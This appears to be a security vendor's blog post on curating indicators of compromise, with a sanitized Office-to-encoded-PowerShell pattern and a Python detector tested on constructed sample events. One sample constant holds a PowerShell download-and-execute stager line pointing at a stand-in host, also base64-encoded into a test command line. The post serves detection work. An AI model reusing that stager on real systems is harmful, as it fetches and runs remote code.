Why your SOC needs threat intelligence (and how to actually use it)

Most threat intel feeds are noise. Here is how we curate IOCs for our SOC analysts.

This article goes deeper into IOC curation with concrete examples drawn from our managed detection environments. Detailed technical breakdowns, the full IOC sets, and the detection rules themselves are reserved for our paying subscribers, but the high-level narrative and one sanitized pattern are here for everyone.

Background

In our SOC, we see thousands of alerts per day across hundreds of client environments. Patterns emerge. This is one of them.

The data presented here is anonymized and aggregated. No specific client environment is identifiable.

Key takeaways

If you remember nothing else from this article, remember these three things: defense-in-depth still works, your weakest control is usually identity, and detection without response is just noise.

# Example IOC pattern (sanitized)
process: powershell.exe
parent: winword.exe
cmdline: -ExecutionPolicy Bypass -EncodedCommand <b64>
network: outbound TCP/443 to a .com domain that is not on the CDN allowlist

The parent/child relation is what makes this pattern worth alerting on. -ExecutionPolicy Bypass on its own shows up in plenty of legitimate administration scripts, but Word has no business launching PowerShell, and -EncodedCommand (base64 of UTF-16LE script text, also accepted as -enc or -e) exists mostly to keep the real command out of plain command-line keyword matches. Treat the egress clause as a severity modifier rather than a precondition: the process chain alone is enough to open a ticket, and outbound traffic to an unknown .com over 443 is what escalates it.
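The pattern above, written out as detection logic and run over constructed sample process-creation events. This is an added example, not the page's own detection rule or any subscriber-only artifact; the record field names, the CDN allowlist, the Office parent list and the sample events are all assumptions made for illustration.

```python
import base64
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Hypothetical allowlist of known-good CDN/update domains. A real SOC derives
# this from its own baseline of observed egress, not from a static list.
CDN_ALLOWLIST = {"officecdn.microsoft.com", "cdn.office.net", "akamaihd.net"}

# Office parents that should not be spawning PowerShell on a workstation (assumed set).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
# The required whitespace after the flag stops "-e" from matching "-ExecutionPolicy".
ENCODED_FLAG = re.compile(
    r"-(?:e|ec|enc|encoded|encodedc|encodedcommand)\s+([A-Za-z0-9+/=]+)",
    re.IGNORECASE,
)


@dataclass
class ProcessEvent:
    """Minimal process-creation record, Sysmon Event ID 1 style. Field names are assumed."""
    image: str
    parent_image: str
    cmdline: str
    dest_host: Optional[str] = None  # first outbound connection by this process, if any
    dest_port: Optional[int] = None


def encode_command(script: str) -> str:
    """Build what -EncodedCommand expects: base64 over UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of an -EncodedCommand argument, or None if absent/undecodable."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def in_allowlist(host: str) -> bool:
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in CDN_ALLOWLIST)


def match_ioc_pattern(ev: ProcessEvent) -> Optional[dict]:
    """Apply the Office -> encoded PowerShell pattern; None when it does not match.

    -ExecutionPolicy Bypass is deliberately not a required term: the parent/child
    relation plus the encoded command is the high-fidelity part. Egress to a
    non-allowlisted .com over 443 only raises severity.
    """
    if ev.image.lower() != "powershell.exe":
        return None
    if ev.parent_image.lower() not in OFFICE_PARENTS:
        return None
    decoded = decode_encoded_command(ev.cmdline)
    if decoded is None:
        return None
    egress = None
    if (ev.dest_host and ev.dest_port == 443
            and ev.dest_host.lower().endswith(".com") and not in_allowlist(ev.dest_host)):
        egress = ev.dest_host
    return {
        "parent": ev.parent_image,
        "decoded_command": decoded,
        "suspicious_egress": egress,
        "severity": "high" if egress else "medium",
    }


def scan(events: List[ProcessEvent]) -> List[Tuple[int, dict]]:
    """Return (event index, findings) for every event that matches the pattern."""
    hits = []
    for i, ev in enumerate(events):
        findings = match_ioc_pattern(ev)
        if findings is not None:
            hits.append((i, findings))
    return hits


STAGER = "IEX (New-Object Net.WebClient).DownloadString('https://stage.example.com/a')"

# Constructed sample events, not real telemetry.
SAMPLE_EVENTS = [
    # 0: full pattern: maldoc macro -> hidden encoded PowerShell -> unknown .com over 443
    ProcessEvent("powershell.exe", "WINWORD.EXE",
                 f"powershell.exe -NoP -W Hidden -ExecutionPolicy Bypass -enc {encode_command(STAGER)}",
                 "stage.example.com", 443),
    # 1: same flags, but launched by an admin from Explorer: no match
    ProcessEvent("powershell.exe", "explorer.exe",
                 f"powershell.exe -ExecutionPolicy Bypass -EncodedCommand {encode_command('Get-Service')}"),
    # 2: Word spawning PowerShell with no encoded command: outside this particular pattern
    ProcessEvent("powershell.exe", "winword.exe", "powershell.exe -File C:\\tools\\export.ps1"),
    # 3: process chain matches, egress goes to an allowlisted CDN: medium, not high
    ProcessEvent("powershell.exe", "winword.exe",
                 f"powershell.exe -EncodedCommand {encode_command(STAGER)}",
                 "officecdn.microsoft.com", 443),
]

if __name__ == "__main__":
    for idx, f in scan(SAMPLE_EVENTS):
        print(idx, f["severity"], f["parent"], f["suspicious_egress"], f["decoded_command"][:40])
```

Decoding the payload at detection time is the part analysts usually want most: the decoded text goes straight into the alert, so triage does not start with a manual base64 step. The regex matches abbreviated flags because real-world samples rarely spell out -EncodedCommand.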


Admin